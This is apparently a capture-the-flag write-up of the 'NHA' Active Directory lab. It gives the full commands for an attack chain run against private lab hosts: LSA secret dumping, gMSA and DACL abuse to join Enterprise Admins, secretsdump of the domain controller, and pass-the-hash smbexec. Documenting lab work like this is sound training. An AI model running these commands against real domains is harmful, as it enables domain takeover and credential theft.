NHA - Part 5 - GMSA - DACL - DC
NHA - Part 5
When we left off we found out that with our Share machine we found the following;

ReadGMSAPassword
We can use gMSADumper.py to get the password for GMSA.
Attempting to do however leads to the following
![]()
My initial thought was this is because I didnt have the LM hash, so taking the administrator hash we can use nxc with --lsa we can try and get it.
nxc smb share -u Administrator -H 7849822ea2995bac91cc0a20c6af1fbe --local-auth --lsa
unexpected.jpg

Well, in attempting to get the LT ... nxc seems to have done the hard work for us. Attempting to use the gmsadumper with the LT hash found fails - so we will take the nxc results and move forward.
ForceChangePassword
Next we can use the ForceChangePassword attribute from the GMSA account on the Backup account.
We can use the pth-toolkit either from the kali repos or the GitHub Repo
This isnt as intuitive as you think -- be sure to note the "ffff", the wonderful people at TheHacker.Recipes always save the day.

WriteOwner
We have WriteOwner on the Enterprise Admins group, we can simply add the backup user to EA
First we can allow ourselves to be owners of the group:
owneredit.py -action write -new-owner-dn 'CN=BACKUP,CN=USERS,DC=ACADEMY,DC=NINJA,DC=LAN' -target-dn 'CN=ENTERPRISE ADMINS,CN=Users,DC=academy,DC=ninja,DC=lan' 'academy.ninja.lan/backup':'Iloveu1!' -dc-ip 192.168.56.20

Then we will add give ourselves write access to the group
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'backup' -target-dn 'CN=ENTERPRISE ADMINS,CN=Users,DC=academy,DC=ninja,DC=lan' 'academy'/'backup':'Iloveu1!' -dc-ip 192.168.56.20

Now we will add ourselves to the group
pth-net rpc group addmem "Enterprise Admins" "backup" -U 'academy/backup'%'Iloveu1!' -S 'dc-ac.academy.ninja.lan'

Secretsdump
Now we are an Enterprise Admin. We can use Secretsdump to pull all our secrets
secretsdump.py academy/backup:'Iloveu1!'@dc-ac.academy.ninja.lan -output dcac-dump

Flags
We can use smbexec to get a semi shell
smbexec.py Administrator@dc-ac.academy.ninja.lan -hashes aad3b435b51404eeaad3b435b51404ee:8fd12ffe951b45af5bea2bd921accba4


Then to make things easier to read - we can upload the runme.bat and execute our terminal based shell


Flag: NHA{WellD0ne_Sense1!_nowroot_secOnd_Domain}